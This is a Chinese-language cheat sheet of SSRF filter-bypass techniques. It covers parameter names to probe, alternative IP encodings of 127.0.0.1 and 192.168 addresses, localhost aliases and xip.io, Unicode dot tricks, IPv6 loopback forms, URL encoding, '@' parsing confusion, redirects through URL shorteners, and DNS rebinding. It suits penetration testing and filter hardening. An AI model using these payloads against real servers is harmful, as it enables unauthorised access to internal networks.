url解析与重定向图片上传文件上传api调用远程文件包含导入\导出网络测试功能

URLdestredirecturipathcontinuewindownextdatareferencesitehtmlvalvalidatedomaincallbackreturnpagefeedhostporttooutviewdirshownavigationIPdomainwebhooklinkimageredirectcalbackapi_urloembed_urloembed_urlproxy

尝试使用不同的IP表示法(如十进制,八进制,十六进制等)绕过输入验证和过滤127.0.0.1127.0.0.1–>localhost127.0.0.1–>7F000001       十六进制127.0.0.1–>2130706433      十进制http://192.168.0.1  >>>  http://3232235521/127.0.0.1–>2130706433       Enclosed Alphanumericshttp://192.168.1.1  >>>  http://3232235777/

使用特殊的域名或子域名,如:localhost,127.0.0.1.xip.io等,来访问内部资源localhostxip.iohttp://127。0。0。1 http://0.0.0.0/http://0/

http://www。qq。comhttp://www｡qq｡comhttp://www．qq．com

http://127.0.0.1 http://localhost http://127.255.255.254 127.0.0.1 - 127.255.255.254 http://[::1] http://[::ffff:7f00:1] http://[::ffff:127.0.0.1] http://127.1 http://127.0.1 http://0:80

尝试使用不同的URL编码方法,如字符编码,双重编码等,绕过输入验证和过滤对请求得内部地址进行URL编码或者二次URL编码

利用web应用程序和底层服务器之间URL解析差易,如使用"@"字符,尖括号等特殊字符如先进行正确得域名后面跟内网地址http://ｘｘｘ．ｘｘｘ．ｘｘｘ@127.0.0.1/XXX

如果后端服务器在接收到参数后，正确的解析了URL的host，并且进行了过滤，这个时候可以尝试使用302跳转的方式来进行绕过可通过在线生成短域名进行302跳转利用HTTP重定向(如301,302跳转将请求从外部资源重定向到内部资源)访问短网址会自动跳转到原来冗长的网址，利用短网址这个特性，我们可以绕过URL参数检测的黑名单利用网址:https://www.urlc.cn/

后端服务器通过DNS解析用户请求的URL参数获取IP地址，然后对返回的IP地址进行判断，如果在黑名单中，就pass掉。由于DNS解析和后续请求存在时间差，可以利用这个时间差进行DNS重绑定攻击。

http://ｘｘｘ．ｘｘｘ．ｘｘｘ@127.0.0.1/XXX

https://www.urlc.cn/